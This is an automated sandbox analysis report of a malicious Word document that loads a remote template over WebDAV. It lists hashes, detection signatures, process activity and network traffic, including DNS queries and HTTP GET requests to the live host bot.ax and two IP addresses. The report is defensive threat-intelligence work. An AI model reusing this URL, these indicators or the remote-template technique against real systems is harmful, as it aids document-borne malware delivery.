Windows Analysis Report
Offer 15492024 15602024.docx.doc

Overview

General Information

Sample name:	Offer 15492024 15602024.docx.doc
Analysis ID:	1446728
MD5:	0d0f500d82551e733eab0fb1060a49da
SHA1:	1e9af5dd484358b007673b0d7f9b85f8ac1a7b6c
SHA256:	d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be
Tags:	docdocx
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for submitted file

Contains an external reference to another file

Document exploit detected (process start blacklist hit)

Office viewer loads remote template

Document misses a certain OLE stream usually present in this Microsoft Office document type

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Offer 15492024 15602024.docx.doc

ReversingLabs: Detection: 13%

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.171.37:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49170 version: TLS 1.2

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Directory queried: number of queries: 1006

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.171.37 172.67.171.37
Source: Joe Sandbox View	IP Address: 104.21.47.128 104.21.47.128

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.171.37:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E279F50C-91EA-4841-A527-8D9534FAEB24}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: bot.ax

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:41:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeset-cookie: PHPSESSID=ccqb5jblbbpgelnc46rrjjjacs; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWn4AR2JlvSGXIYHhmmkBq4m0b9AN9ruCiuFGW5GrXSo3pf1ytUz5%2F4dXhkqFI2X91%2BaP9fqqSKY%2FAKuo%2FSYodhTojFaZC77pauiNowuecahNqhZ1ofoZWo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88872db6a9cd0f6b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:41:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: PHPSESSID=8pqa1qkp3733as8k1h92tuc7et; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zg3sDoZsaDlJ2YKgBtWaci3lH8cInlpxk2SYPdK6Pw2WOmshxm%2BqnEe4zHlQKB1chA1TOG7T4qp7l5mPW3u59W1eb4lj4OQHiv%2BtcaMYWFSUprWjrvffodk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88872dded9010dc7-EWRalt-svc: h3=":443"; ma=86400

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown

HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49170 version: TLS 1.2

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal68.expl.evad.winDOC@18/29@5/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$fer 15492024 15602024.docx.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6BDC.tmp

Jump to behavior

Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true

Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Offer 15492024 15602024.docx.doc

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior

Source: Offer 15492024 15602024.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Offer 15492024 15602024.docx.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject7.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject6.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject5.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/media/image2.emf
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject4.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject3.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Offer 15492024 15602024.docx.doc

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: \Device\RdpDr\;:1\bot.ax\DavWWWRoot

Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: http://bot.ax/hnzdz

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
